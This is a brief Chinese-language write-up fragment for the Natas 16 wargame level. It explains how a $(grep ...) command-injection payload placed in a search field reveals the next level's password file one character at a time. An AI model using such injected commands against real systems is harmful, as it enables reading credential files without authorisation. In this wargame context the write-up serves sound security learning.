natas16
;|&`\'"
duck
,發現找到多筆匹配,再根據結果改成搜尋 ducks
則只有一筆符合
$(command)
構造 Payload ducks$(grep ^a /etc/natas_webpass/natas17)
,代表以 a
開頭的字串是否存在於下關密碼中,若存在則執行 grep –i "ducksa" dictionary.txt
導致回顯為空;若不存在則執行 grep –i "ducks" dictionary.txt
則回顯只包含 ducks
字串